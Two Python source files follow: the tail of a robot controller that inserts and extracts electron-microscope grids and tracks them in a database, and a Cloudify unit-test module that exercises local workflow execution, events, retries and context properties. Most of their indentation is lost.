time.sleep(0.5)
self.communication.Signal2 = 0
self.logger.info('Robot has completed insertion step 1')
def waitForRobotToInsert2(self):
self.logger.info('Waiting for robot to complete insertion step 2')
while not self.communication.Signal4:
time.sleep(0.5)
self.communication.Signal4 = 0
self.logger.info('Robot has completed insertion step 2')
def robotReadyForExtraction(self):
self.logger.info('Verifying robot is ready for extraction')
while not self.communication.Signal5:
time.sleep(0.5)
self.communication.Signal5 = 0
self.logger.info('Robot is ready for extraction')
def waitForRobotToExtract(self):
self.logger.info('Waiting for robot to complete extraction')
while not self.communication.Signal7:
self.communication.Signal11 = int(self.settings['grid clear wait'])
if self.communication.Signal9:
self.logger.warning('Robot failed to remove grid from specimen holder')
if self.communication.Signal11 == 0:
self.autoGridClear()
else:
self.waitForGridClear()
self.communication.Signal9 = 0
self.setStatus('processing')
self.logger.info('Resuming operation')
time.sleep(0.5)
self.communication.Signal7 = 0
self.logger.info('Robot has completed extraction')
def getUserGridRequest(self):
gridnumber = -1
while not validateGridNumber(gridnumber):
gridnumber = self.panel.getNextGrid()
if gridnumber is None:
return None
return GridRequest(gridnumber)
def newGrid(self, gridboxid, gridnumber):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to create grid information: %s' % e)
return None
return projectdata.newGrid('Robot Generated Grid #%d' % gridnumber,
-1, gridnumber, gridboxid, gridnumber)
def getGridNumber(self, gridid):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to find grid information: %s' % e)
return None
grids = projectdata.getGrids()
gridsindex = grids.Index(['gridId'])
grid = gridsindex[gridid].fetchone()
if grid is None:
			self.logger.error('Failed to find grid information for grid ID %s' % gridid)
return None
gridlabel = grid['label']
if grid['boxId'] != self.gridtrayid:
boxlabel = self.gridtraylabels[grid['boxId']]
self.logger.error('Grid "%s" is not in selected grid tray, but in "%s"' % (gridlabel,boxlabel))
return None
gridlocations = projectdata.getGridLocations()
gridlocationsindex = gridlocations.Index(['gridId'])
gridlocation = gridlocationsindex[gridid].fetchone()
if gridlocation is None:
self.logger.error('Failed to find grid number for grid "%s"' % (gridlabel))
return None
if gridlocation['gridboxId'] != self.gridtrayid:
boxlabel = self.gridtraylabels[gridlocation['gridboxId']]
self.logger.error('Last location for grid "%s" does not match selected tray, but "%s"' % (gridlabel,boxlabel))
return None
return int(gridlocation['location'])
def getGridID(self, gridboxid, gridnumber):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to find grid information: %s' % e)
return None
gridlocations = projectdata.getGridLocations()
gridboxidindex = gridlocations.Index(['gridboxId'])
gridlocations = gridboxidindex[gridboxid].fetchall()
for gridlocation in gridlocations:
if gridlocation['location'] == gridnumber:
return gridlocation['gridId']
return self.newGrid(gridboxid, gridnumber)
def publishEMGridData(self,gridid):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to get grid labels: %s' % e)
return None
gridinfo = projectdata.getGridInfo(gridid)
emgriddata = leginondata.EMGridData()
emgriddata['name'] = gridinfo['label']
emgriddata['project'] = gridinfo['projectId']
self.publish(emgriddata, database=True)
return emgriddata
def makeGridData(self, gridnumber):
gridid = self.getGridID(self.gridtrayid, gridnumber)
if gridid is None:
return None
emgriddata = self.publishEMGridData(gridid)
initializer = {'grid ID': gridid}
querydata = leginondata.GridData(initializer=initializer)
griddatalist = self.research(querydata)
insertion = 0
for griddata in griddatalist:
if griddata['insertion'] > insertion:
insertion = griddata['insertion']
initializer = {'grid ID': gridid, 'insertion': insertion + 1, 'emgrid': emgriddata}
griddata = leginondata.GridData(initializer=initializer)
self.publish(griddata, database=True)
return griddata
def selectGrid(self, gridnumber):
if gridnumber is not None:
self.logger.info('Current grid: %d' % gridnumber)
self.communication.gridNumber = gridnumber
def robotReadyForInsertion(self):
self.logger.info('Verifying robot is ready for insertion')
while not self.communication.Signal0:
if self.communication.Signal8:
self.logger.warning('Robot failed to extract grid from tray')
self.communication.Signal8 = 0
raise GridLoadFromTrayError
time.sleep(0.5)
self.communication.Signal0 = 0
self.logger.info('Robot is ready for insertion')
def estimateTimeLeft(self):
if 'insert' not in self.timings:
self.timings['insert'] = []
self.timings['insert'].append(time.time())
timestring = ''
ntimings = len(self.timings['insert']) - 1
if ntimings > 0:
first = self.timings['insert'][0]
last = self.timings['insert'][-1]
ngridsleft = self.panel.getGridQueueSize()
secondsleft = (last - first)/ntimings*ngridsleft
timestring = seconds2str(secondsleft)
if timestring:
self.logger.info(timestring + ' remaining')
def insert(self):
self.lockScope()
		self.logger.info('insert: simulate=%s, setting=%s' % (self.simulate, self.settings['simulate']))
if self.simulate or self.settings['simulate']:
self.estimateTimeLeft()
self.logger.info('Insertion of holder successfully completed')
try:
griddata = self.gridInserted(self.gridnumber)
except Exception, e:
self.logger.error('Failed to get scope ready for imaging: %s' % e)
self.unlockScope()
raise
self.unlockScope()
return griddata
self.estimateTimeLeft()
self.logger.info('Inserting holder into microscope')
self.turboPumpOn()
self.robotReadyForInsertion()
try:
self.scopeReadyForInsertion1()
except Exception, e:
self.unlockScope()
self.logger.error('Failed to get scope ready for insertion 1: %s' % e)
raise
self.signalRobotToInsert1()
self.waitForRobotToInsert1()
try:
self.scopeReadyForInsertion2()
except Exception, e:
self.unlockScope()
self.logger.error('Failed to get scope ready for insertion 2: %s' % e)
raise
self.signalRobotToInsert2()
self.waitForRobotToInsert2()
self.logger.info('Insertion of holder successfully completed')
try:
griddata = self.gridInserted(self.gridnumber)
except Exception, e:
self.logger.error('Failed to get scope ready for imaging: %s' % e)
self.unlockScope()
return
self.unlockScope()
return griddata
def extract(self):
if self.simulate or self.settings['simulate']:
self.logger.info('Extraction of holder successfully completed')
return
self.logger.info('Extracting holder from microscope')
self.lockScope()
self.turboPumpOn()
self.robotReadyForExtraction()
try:
self.scopeReadyForExtraction()
except Exception, e:
self.unlockScope()
self.logger.error('Failed to get scope ready for extraction: %s' % e)
raise
self.signalRobotToExtract()
self.waitForRobotToExtract()
self.unlockScope()
self.logger.info('Extraction of holder successfully completed')
def handleGridDataCollectionDone(self, ievent):
# ...
if self.settings['pause']:
# pause for user check
self.setStatus('user input')
self.logger.info('waiting for user to continue...')
self.usercontinue.clear()
self.usercontinue.wait()
self.usercontinue.clear()
self.setStatus('processing')
self.logger.info('continuing')
self.panel.extractingGrid()
self.extractcondition.acquire()
self.extractinfo = (None, None)
self.extractcondition.notify()
self.extractcondition.release()
def getTrayLabels(self):
self.traysFromDB()
return self.gridtrayids.keys()
def setTray(self, traylabel):
try:
self.gridtrayid = self.gridtrayids[traylabel]
except KeyError:
raise ValueError('unknown tray label')
def getGridLabels(self, gridlist):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to get grid labels: %s' % e)
return None
gridlabels = []
for gridid in gridlist:
gridlabels.append(str(projectdata.getGridLabel(gridid)))
return gridlabels
def getGridLocations(self, traylabel):
try:
gridboxid = self.gridtrayids[traylabel]
except KeyError:
raise ValueError('unknown tray label')
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to get grid locations: %s' % e)
return None
gridlocations = projectdata.getGridLocations()
gridboxidindex = gridlocations.Index(['gridboxId'])
gridlocations = gridboxidindex[gridboxid].fetchall()
gridlabels = [i['gridId'] for i in gridlocations]
return [int(i['location']) for i in gridlocations],gridlabels
def gridInserted(self, gridnumber):
if self.simulate or self.settings['simulate']:
evt = event.MakeTargetListEvent()
evt['grid'] = self.makeGridData(gridnumber)
if evt['grid'] is None:
self.logger.error('Data collection event not sent')
else:
self.outputEvent(evt)
self.logger.info('Data collection event outputted')
return evt['grid']
self.logger.info('Grid inserted.')
self.scopeReadyForImaging()
self.logger.info('Outputting data collection event')
evt = event.MakeTargetListEvent()
evt['grid'] = self.makeGridData(gridnumber)
if evt['grid'] is None:
self.logger.error('Data collection event not sent')
else:
self.outputEvent(evt)
self.logger.info('Data collection event outputted')
return evt['grid']
def waitScope(self, parameter, value, interval=None, timeout=0.0):
if self.instrument.tem.hasAttribute(parameter):
o = self.instrument.tem
elif self.instrument.ccdcamera.hasAttribute(parameter):
o = self.instrument.ccdcamera
else:
raise ValueError('invalid parameter')
parametervalue = getattr(o, parameter)
elapsed = 0.0
if interval is not None and interval > 0:
while parametervalue != value:
time.sleep(interval)
if timeout > 0.0:
elapsed += interval
if elapsed > timeout:
raise ValueError('parameter is not set to value')
parametervalue = getattr(o, parameter)
else:
if parametervalue != value:
raise ValueError('parameter is not set to value')
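	# waitScope usage (as called throughout this module): poll a TEM or CCD-camera
	# attribute until it equals `value`, sleeping `interval` seconds between reads;
	# with timeout=0.0 (the default) it polls indefinitely, and with interval=None
	# it checks the value only once, e.g.:
	#   self.waitScope('ColumnValvePosition', 'open', 0.25)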
|
test_local_workflows.py
|
########
# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import contextlib
import time
import yaml
import sys
import tempfile
import shutil
import os
import threading
import Queue
import testtools
from testtools.matchers import ContainsAll
import cloudify.logs
from cloudify.decorators import workflow, operation
from cloudify.exceptions import NonRecoverableError
from cloudify.workflows import local
from cloudify.workflows import workflow_context
from cloudify.workflows.workflow_context import task_config
PLUGIN_PACKAGE_NAME = 'test-package'
PLUGIN_PACKAGE_VERSION = '1.1.1'
class BaseWorkflowTest(object):
def setUp(self):
self.work_dir = tempfile.mkdtemp(prefix='cloudify-workflows-')
self.blueprint_dir = os.path.join(self.work_dir, 'blueprint')
self.storage_dir = os.path.join(self.work_dir, 'storage')
self.storage_kwargs = {}
self.env = None
os.mkdir(self.storage_dir)
self.addCleanup(self.cleanup)
testtools.TestCase.setUp(self)
def cleanup(self):
shutil.rmtree(self.work_dir)
self._remove_temp_module()
def _init_env(self, blueprint_path,
inputs=None,
name=None,
ignored_modules=None,
provider_context=None):
if name is None:
name = self._testMethodName
storage = self.storage_cls(**self.storage_kwargs)
if isinstance(storage, local.FileStorage) \
and (self.storage_dir != self.blueprint_dir):
shutil.rmtree(self.storage_kwargs['storage_dir'])
return local.init_env(blueprint_path,
name=name,
inputs=inputs,
storage=storage,
ignored_modules=ignored_modules,
provider_context=provider_context)
def _load_env(self, name):
if name is None:
name = self._testMethodName
storage = self.storage_cls(**self.storage_kwargs)
return local.load_env(name=name,
storage=storage)
def _setup_env(self,
workflow_methods=None,
operation_methods=None,
use_existing_env=True,
name=None,
inputs=None,
create_blueprint_func=None,
workflow_parameters_schema=None,
load_env=False,
ignored_modules=None,
operation_retries=None,
operation_retry_interval=None,
provider_context=None):
if create_blueprint_func is None:
create_blueprint_func = self._blueprint_1
def stub_op(ctx, **_):
pass
if operation_methods is None:
operation_methods = [stub_op]
if workflow_methods[0] is None:
def workflow_method(ctx, **_):
instance = _instance(ctx, 'node')
instance.set_state('state').get()
instance.execute_operation('test.op0')
workflow_methods = [workflow_method]
# same as @workflow above the method
workflow_methods = [workflow(m) for m in workflow_methods]
# same as @operation above each op method
operation_methods = [operation(m) for m in operation_methods]
temp_module = self._create_temp_module()
for workflow_method in workflow_methods:
setattr(temp_module,
workflow_method.__name__,
workflow_method)
for operation_method in operation_methods:
setattr(temp_module,
operation_method.__name__,
operation_method)
blueprint = create_blueprint_func(workflow_methods,
operation_methods,
workflow_parameters_schema,
ignored_modules,
operation_retries,
operation_retry_interval)
inner_dir = os.path.join(self.blueprint_dir, 'inner')
if not os.path.isdir(self.blueprint_dir):
os.mkdir(self.blueprint_dir)
if not os.path.isdir(inner_dir):
os.mkdir(inner_dir)
with open(os.path.join(inner_dir, 'imported.yaml'), 'w') as f:
f.write('node_types: { imported_type: {} }')
with open(os.path.join(self.blueprint_dir, 'resource'), 'w') as f:
f.write('content')
blueprint_path = os.path.join(self.blueprint_dir, 'blueprint.yaml')
with open(blueprint_path, 'w') as f:
f.write(yaml.safe_dump(blueprint))
if not self.env or not use_existing_env:
if load_env:
self.env = self._load_env(name)
else:
self.env = self._init_env(blueprint_path,
inputs=inputs,
name=name,
ignored_modules=ignored_modules,
provider_context=provider_context)
def _execute_workflow(self,
workflow_method=None,
operation_methods=None,
use_existing_env=True,
execute_kwargs=None,
name=None,
inputs=None,
create_blueprint_func=None,
workflow_parameters_schema=None,
workflow_name='workflow0',
load_env=False,
setup_env=True,
ignored_modules=None,
operation_retries=None,
operation_retry_interval=None,
provider_context=None):
if setup_env:
self._setup_env(
workflow_methods=[workflow_method],
operation_methods=operation_methods,
use_existing_env=use_existing_env,
name=name,
inputs=inputs,
create_blueprint_func=create_blueprint_func,
workflow_parameters_schema=workflow_parameters_schema,
load_env=load_env,
ignored_modules=ignored_modules,
operation_retries=operation_retries,
operation_retry_interval=operation_retry_interval,
provider_context=provider_context)
elif load_env:
self.env = self._load_env(name)
execute_kwargs = execute_kwargs or {}
final_execute_kwargs = {
'task_retries': 0,
'task_retry_interval': 1
}
final_execute_kwargs.update(execute_kwargs)
return self.env.execute(workflow_name, **final_execute_kwargs)
def _blueprint_1(self, workflow_methods, operation_methods,
workflow_parameters_schema, ignored_modules,
operation_retries, operation_retry_interval):
interfaces = {
'test': dict(
('op{0}'.format(index),
{'implementation': 'p.{0}.{1}'.format(self._testMethodName,
op_method.__name__),
'max_retries': operation_retries,
'retry_interval': operation_retry_interval})
for index, op_method in
enumerate(operation_methods)
)
}
if ignored_modules:
interfaces['test'].update({'ignored_op': 'p.{0}.ignored'
.format(ignored_modules[0])})
workflows = dict((
('workflow{0}'.format(index), {
'mapping': 'p.{0}.{1}'.format(self._testMethodName,
w_method.__name__),
'parameters': workflow_parameters_schema or {}
}) for index, w_method in enumerate(workflow_methods)
))
blueprint = {
'tosca_definitions_version': 'cloudify_dsl_1_3',
'imports': ['inner/imported.yaml'],
'inputs': {
'from_input': {
'default': 'from_input_default_value'
}
},
'outputs': {
'some_output': {
'value': {'get_attribute': ['node', 'some_output']},
},
'static': {
'value': {'get_attribute': ['node', 'property']}
}
},
'plugins': {
'p': {
'executor': 'central_deployment_agent',
'install': False,
'package_name': PLUGIN_PACKAGE_NAME,
'package_version': PLUGIN_PACKAGE_VERSION
}
},
'node_types': {
'type': {
'properties': {
'property': {
'default': 'default'
},
'from_input': {
'default': 'from_input_default_value'
}
}
},
'cloudify.nodes.Compute': {
'derived_from': 'type',
'properties': {
'ip': {
'default': ''
}
}
}
},
'relationships': {
'cloudify.relationships.contained_in': {}
},
'node_templates': {
'node4': {
'type': 'type',
'interfaces': interfaces,
'relationships': [{
'target': 'node3',
'type': 'cloudify.relationships.contained_in',
}]
},
'node3': {
'type': 'cloudify.nodes.Compute',
'interfaces': interfaces,
'properties': {
'ip': '1.1.1.1'
}
},
'node2': {
'type': 'cloudify.nodes.Compute',
'interfaces': interfaces,
},
'node': {
'type': 'type',
'interfaces': interfaces,
'properties': {
'property': 'value',
'from_input': {'get_input': 'from_input'}
},
'relationships': [{
'target': 'node2',
'type': 'cloudify.relationships.contained_in',
'source_interfaces': interfaces,
'target_interfaces': interfaces
}]
},
'node5': {
'type': 'imported_type'
}
},
'workflows': workflows,
'groups': {
'group1': {
'members': ['node']
}
},
'policies': {
'policy1': {
'type': 'cloudify.policies.scaling',
'targets': ['group1']
}
}
}
return blueprint
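    # Topology generated above (for orientation when reading the assertions in the
    # tests below): 'node' is contained_in 'node2', 'node4' is contained_in 'node3';
    # 'node2' and 'node3' are cloudify.nodes.Compute hosts, 'node5' uses the
    # imported type, and 'node' belongs to scaling group 'group1'.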
def _create_temp_module(self):
import imp
temp_module = imp.new_module(self._testMethodName)
sys.modules[self._testMethodName] = temp_module
return temp_module
def _remove_temp_module(self):
if self._testMethodName in sys.modules:
del sys.modules[self._testMethodName]
@contextlib.contextmanager
def _mock_stdout_event_and_log(self):
events = []
logs = []
# Provide same interface as other log/event functions
def mock_stdout_event(event):
events.append(event)
# Provide same interface as other log/event functions
def mock_stdout_log(log):
logs.append(log)
o_stdout_event = cloudify.logs.stdout_event_out
o_stdout_log = cloudify.logs.stdout_log_out
cloudify.logs.stdout_event_out = mock_stdout_event
cloudify.logs.stdout_log_out = mock_stdout_log
try:
yield events, logs
finally:
            # restore the original stdout log/event output functions
            cloudify.logs.stdout_log_out = o_stdout_log
            cloudify.logs.stdout_event_out = o_stdout_event
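    # Usage (as in the tests below): the context manager temporarily swaps the
    # cloudify.logs output functions so emitted events/logs are captured in plain
    # lists, e.g.:
    #   with self._mock_stdout_event_and_log() as (events, logs):
    #       self._execute_workflow(...)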
def _test_retry_configuration_impl(self,
global_retries,
global_retry_interval,
operation_retries,
operation_retry_interval):
expected_retries = global_retries
if operation_retries is not None:
expected_retries = operation_retries
expected_retry_interval = global_retry_interval
if operation_retry_interval is not None:
expected_retry_interval = operation_retry_interval
def flow(ctx, **_):
instance = _instance(ctx, 'node')
instance.execute_operation('test.op0', kwargs={
'props': {'key': 'initial_value'}
}).get()
instance.execute_operation('test.op1').get()
def op0(ctx, props, **_):
self.assertIsNotNone(ctx.instance.id)
current_retry = ctx.instance.runtime_properties.get('retry', 0)
last_timestamp = ctx.instance.runtime_properties.get('timestamp')
current_timestamp = time.time()
ctx.instance.runtime_properties['retry'] = current_retry + 1
ctx.instance.runtime_properties['timestamp'] = current_timestamp
self.assertEqual('initial_value', props['key'])
props['key'] = 'new_value'
if current_retry > 0:
duration = current_timestamp - last_timestamp
self.assertTrue(expected_retry_interval <= duration <=
expected_retry_interval + 0.5)
if current_retry < expected_retries:
self.fail()
def op1(ctx, **_):
self.assertEqual(
expected_retries + 1, ctx.instance.runtime_properties['retry'])
self._execute_workflow(
flow,
operation_methods=[op0, op1],
operation_retries=operation_retries,
operation_retry_interval=operation_retry_interval,
execute_kwargs={
'task_retry_interval': global_retry_interval,
'task_retries': global_retries})
class LocalWorkflowTest(BaseWorkflowTest):
def setUp(self):
super(LocalWorkflowTest, self).setUp()
def test_workflow_and_operation_logging_and_events(self):
def assert_task_events(indexes, events):
self.assertEqual('sending_task',
events[indexes[0]]['event_type'])
self.assertEqual('task_started',
events[indexes[1]]['event_type'])
self.assertEqual('task_succeeded',
events[indexes[2]]['event_type'])
def the_workflow(ctx, **_):
def local_task():
pass
instance = _instance(ctx, 'node')
ctx.logger.info('workflow_logging')
ctx.send_event('workflow_event').get()
instance.logger.info('node_instance_logging')
instance.send_event('node_instance_event').get()
instance.execute_operation('test.op0').get()
ctx.local_task(local_task).get()
def the_operation(ctx, **_):
ctx.logger.info('op_logging')
ctx.send_event('op_event')
with self._mock_stdout_event_and_log() as (events, logs):
self._execute_workflow(the_workflow, operation_methods=[
the_operation])
self.assertEqual(11, len(events))
self.assertEqual(3, len(logs))
self.assertEqual('workflow_started',
events[0]['event_type'])
self.assertEqual('workflow_event',
events[1]['message']['text'])
self.assertEqual('node_instance_event',
events[2]['message']['text'])
assert_task_events([3, 4, 6], events)
self.assertEqual('op_event',
events[5]['message']['text'])
assert_task_events([7, 8, 9], events)
self.assertEqual('workflow_succeeded',
events[10]['event_type'])
self.assertEqual('workflow_logging',
logs[0]['message']['text'])
self.assertEqual('node_instance_logging',
logs[1]['message']['text'])
self.assertEqual('op_logging',
logs[2]['message']['text'])
def test_task_event_filtering(self):
def flow1(ctx, **_):
def task():
pass
ctx.local_task(task)
with self._mock_stdout_event_and_log() as (events, _):
self._execute_workflow(flow1, use_existing_env=False)
self.assertEqual(5, len(events))
def flow2(ctx, **_):
def task():
pass
ctx.local_task(task, send_task_events=False)
with self._mock_stdout_event_and_log() as (events, _):
self._execute_workflow(flow2,
use_existing_env=False)
self.assertEqual(2, len(events))
def flow3(ctx, **_):
@task_config(send_task_events=False)
def task():
pass
ctx.local_task(task)
with self._mock_stdout_event_and_log() as (events, _):
self._execute_workflow(flow3, use_existing_env=False)
self.assertEqual(2, len(events))
def flow4(ctx, **_):
@task_config(send_task_events=True)
def task():
pass
ctx.local_task(task)
with self._mock_stdout_event_and_log() as (events, _):
self._execute_workflow(flow4, use_existing_env=False)
self.assertEqual(5, len(events))
def flow5(ctx, **_):
def task():
self.fail()
ctx.local_task(task, send_task_events=False)
with self._mock_stdout_event_and_log() as (events, _):
self.assertRaises(AssertionError,
self._execute_workflow,
flow5, use_existing_env=False)
self.assertEqual(3, len(events))
self.assertEqual('task_failed', events[1]['event_type'])
self.assertEqual('workflow_failed', events[2]['event_type'])
def test_task_config_decorator(self):
def flow(ctx, **_):
task_config_kwargs = {'key': 'task_config'}
invocation_kwargs = {'key': 'invocation'}
@task_config(kwargs=task_config_kwargs)
def task1(**kwargs):
self.assertEqual(kwargs, task_config_kwargs)
ctx.local_task(task1).get()
@task_config(kwargs=task_config_kwargs)
def task2(**kwargs):
self.assertEqual(kwargs, task_config_kwargs)
ctx.local_task(task2, kwargs=invocation_kwargs).get()
@task_config(kwargs=task_config_kwargs)
def task3(**kwargs):
self.assertEqual(kwargs, invocation_kwargs)
ctx.local_task(task3,
kwargs=invocation_kwargs,
override_task_config=True).get()
self._execute_workflow(flow)
def test_workflow_bootstrap_context(self):
def bootstrap_context(ctx, **_):
bootstrap_context = ctx.internal._get_bootstrap_context()
self.assertEqual(bootstrap_context, {})
self._execute_workflow(bootstrap_context)
def test_update_execution_status(self):
def update_execution_status(ctx, **_):
ctx.update_execution_status('status')
self.assertRaises(NotImplementedError,
self._execute_workflow,
update_execution_status)
def test_workflow_set_get_node_instance_state(self):
def get_set_node_instance_state(ctx, **_):
instance = _instance(ctx, 'node')
self.assertIsNone(instance.get_state().get())
instance.set_state('state').get()
self.assertEquals('state', instance.get_state().get())
self._execute_workflow(get_set_node_instance_state)
def test_workflow_ctx_properties(self):
def attributes(ctx, **_):
self.assertEqual(self._testMethodName, ctx.blueprint.id)
self.assertEqual(self._testMethodName, ctx.deployment.id)
self.assertEqual(
['node'], ctx.deployment.scaling_groups['group1']['members'])
node_instance = next(ctx.get_node('node').instances)
scaling_groups = node_instance.scaling_groups
self.assertEqual(1, len(scaling_groups))
self.assertEqual('group1', scaling_groups[0]['name'])
self.assertEqual('workflow0', ctx.workflow_id)
self.assertIsNotNone(ctx.execution_id)
self._execute_workflow(attributes)
def test_workflow_blueprint_model(self):
def blueprint_model(ctx, **_):
nodes = list(ctx.nodes)
node1 = ctx.get_node('node')
node2 = ctx.get_node('node2')
node1_instances = list(node1.instances)
node2_instances = list(node2.instances)
instance1 = node1_instances[0]
instance2 = node2_instances[0]
node1_relationships = list(node1.relationships)
node2_relationships = list(node2.relationships)
instance1_relationships = list(instance1.relationships)
instance2_relationships = list(instance2.relationships)
relationship = node1_relationships[0]
relationship_instance = instance1_relationships[0]
self.assertEqual(5, len(nodes))
self.assertEqual(1, len(node1_instances))
self.assertEqual(1, len(node2_instances))
self.assertEqual(1, len(node1_relationships))
self.assertEqual(0, len(node2_relationships))
self.assertEqual(1, len(instance1_relationships))
self.assertEqual(0, len(instance2_relationships))
sorted_ops = ['op0', 'test.op0']
self.assertEqual(1, node1.number_of_instances)
self.assertEqual(1, node2.number_of_instances)
self.assertEqual('node', node1.id)
self.assertEqual('node2', node2.id)
self.assertEqual('type', node1.type)
self.assertEqual('type', node1.type)
self.assertEqual('cloudify.nodes.Compute', node2.type)
self.assertEqual(['type'], node1.type_hierarchy)
self.assertEqual(['type', 'cloudify.nodes.Compute'],
node2.type_hierarchy)
self.assertThat(node1.properties.items(),
ContainsAll({'property': 'value'}.items()))
self.assertThat(node2.properties.items(),
ContainsAll({'property': 'default'}.items()))
self.assertEqual(sorted_ops, sorted(node1.operations.keys()))
self.assertEqual(sorted_ops, sorted(node2.operations.keys()))
self.assertIs(relationship, node1.get_relationship('node2'))
self.assertIn('node_', instance1.id)
self.assertIn('node2_', instance2.id)
self.assertEqual('node', instance1.node_id)
self.assertEqual('node2', instance2.node_id)
self.assertIs(node1, instance1.node)
self.assertIs(node2, instance2.node)
self.assertEqual(node2.id, relationship.target_id)
self.assertTrue(relationship.is_derived_from(
"cloudify.relationships.contained_in"
))
self.assertEqual(node2, relationship.target_node)
self.assertEqual(sorted_ops,
sorted(relationship.source_operations.keys()))
self.assertEqual(sorted_ops,
sorted(relationship.target_operations.keys()))
self.assertEqual(instance2.id, relationship_instance.target_id)
self.assertEqual(instance2,
relationship_instance.target_node_instance)
self.assertIs(relationship, relationship_instance.relationship)
self._execute_workflow(blueprint_model)
def test_operation_capabilities(self):
def the_workflow(ctx, **_):
instance = _instance(ctx, 'node')
instance2 = _instance(ctx, 'node2')
instance2.execute_operation('test.op0').get()
instance.execute_operation('test.op1').get()
def op0(ctx, **_):
ctx.instance.runtime_properties['key'] = 'value'
def op1(ctx, **_):
caps = ctx.capabilities.get_all()
self.assertEqual(1, len(caps))
key, value = next(caps.iteritems())
self.assertIn('node2_', key)
self.assertEqual(value, {'key': 'value'})
self._execute_workflow(the_workflow, operation_methods=[op0, op1])
def test_operation_runtime_properties(self):
def runtime_properties(ctx, **_):
instance = _instance(ctx, 'node')
instance.execute_operation('test.op0').get()
instance.execute_operation('test.op1').get()
def op0(ctx, **_):
ctx.instance.runtime_properties['key'] = 'value'
def op1(ctx, **_):
self.assertEqual('value', ctx.instance.runtime_properties['key'])
self._execute_workflow(runtime_properties, operation_methods=[
op0, op1])
def test_operation_related_properties(self):
def the_workflow(ctx, **_):
instance = _instance(ctx, 'node')
relationship = next(instance.relationships)
relationship.execute_source_operation('test.op0')
relationship.execute_target_operation('test.op0')
def op(ctx, **_):
if 'node2_' in ctx.target.instance.id:
self.assertThat(ctx.target.node.properties.items(),
ContainsAll({'property': 'default'}.items()))
elif 'node_' in ctx.target.instance.id:
self.assertThat(ctx.target.node.properties.items(),
ContainsAll({'property': 'value'}.items()))
else:
self.fail('unexpected: {0}'.format(ctx.target.instance.id))
self._execute_workflow(the_workflow, operation_methods=[op])
def test_operation_related_runtime_properties(self):
def related_runtime_properties(ctx, **_):
instance = _instance(ctx, 'node')
instance2 = _instance(ctx, 'node2')
relationship = next(instance.relationships)
instance.execute_operation('test.op0',
kwargs={'value': 'instance1'}).get()
instance2.execute_operation('test.op0',
kwargs={'value': 'instance2'}).get()
relationship.execute_source_operation(
'test.op1', kwargs={
'source': 'instance1',
'target': 'instance2'
}).get()
relationship.execute_target_operation(
'test.op1', kwargs={
'source': 'instance1',
'target': 'instance2'
}).get()
def op0(ctx, value, **_):
ctx.instance.runtime_properties['key'] = value
def op1(ctx, source, target, **_):
self.assertEqual(source,
ctx.source.instance.runtime_properties['key'])
self.assertEqual(target,
ctx.target.instance.runtime_properties['key'])
self._execute_workflow(related_runtime_properties, operation_methods=[
op0, op1])
def test_operation_ctx_properties_and_methods(self):
def flow(ctx, **_):
instance = _instance(ctx, 'node')
instance.set_state('state').get()
instance.execute_operation('test.op0').get()
target_path = ctx.internal.handler.download_deployment_resource(
'resource')
with open(target_path) as f:
self.assertEqual('content', f.read())
def ctx_properties(ctx, **_):
self.assertEqual('node', ctx.node.name)
self.assertIn('node_', ctx.instance.id)
self.assertEqual(self._testMethodName, ctx.blueprint.id)
self.assertEqual(self._testMethodName, ctx.deployment.id)
self.assertIsNotNone(ctx.execution_id)
self.assertEqual('workflow0', ctx.workflow_id)
self.assertIsNotNone(ctx.task_id)
self.assertEqual('{0}.{1}'.format(self._testMethodName,
'ctx_properties'),
ctx.task_name)
self.assertIsNone(ctx.task_target)
self.assertEqual('p', ctx.plugin)
self.assertEqual('p', ctx.plugin.name)
self.assertEqual(PLUGIN_PACKAGE_NAME, ctx.plugin.package_name)
self.assertEqual(PLUGIN_PACKAGE_VERSION,
ctx.plugin.package_version)
self.assertEqual(sys.prefix, ctx.plugin.prefix)
self.assertEqual('test.op0', ctx.operation.name)
self.assertThat(ctx.node.properties.items(),
ContainsAll({'property': 'value'}.items()))
self.assertEqual('content', ctx.get_resource('resource'))
target_path = ctx.download_resource('resource')
with open(target_path) as f:
self.assertEqual('content', f.read())
expected_target_path = os.path.join(self.work_dir, 'resource')
target_path = ctx.download_resource(
'resource', target_path=expected_target_path)
self.assertEqual(target_path, expected_target_path)
with open(target_path) as f:
self.assertEqual('content', f.read())
self._execute_workflow(flow, operation_methods=[ctx_properties])
def test_ctx_host_ip(self):
def op0(ctx, **_):
ctx.instance.runtime_properties['ip'] = '2.2.2.2'
def op1(ctx, expected_ip, **_):
self.assertEqual(ctx.instance.host_ip, expected_ip)
def flow(ctx, **_):
instance1 = _instance(ctx, 'node')
instance4 = _instance(ctx, 'node4')
# these are hosts
            # in this one we will set a runtime_property of ip
instance2 = _instance(ctx, 'node2')
# this one has ip as static properties
instance3 = _instance(ctx, 'node3')
instance2.execute_operation('test.op0').get()
instance1.execute_operation('test.op1', kwargs={
'expected_ip': '2.2.2.2'
}).get()
instance2.execute_operation('test.op1', kwargs={
'expected_ip': '2.2.2.2'
}).get()
instance3.execute_operation('test.op1', kwargs={
'expected_ip': '1.1.1.1'
}).get()
instance4.execute_operation('test.op1', kwargs={
'expected_ip': '1.1.1.1'
}).get()
self._execute_workflow(flow, operation_methods=[op0, op1])
def test_operation_bootstrap_context(self):
bootstrap_context = {'stub': 'prop'}
provider_context = {
'cloudify': bootstrap_context
}
def contexts(ctx, **_):
self.assertEqual(bootstrap_context,
ctx.bootstrap_context._bootstrap_context)
self.assertEqual(provider_context, ctx.provider_context)
self._execute_workflow(operation_methods=[contexts],
provider_context=provider_context)
def test_workflow_graph_mode(self):
def flow(ctx, **_):
instance = _instance(ctx, 'node')
graph = ctx.graph_mode()
sequence = graph.sequence()
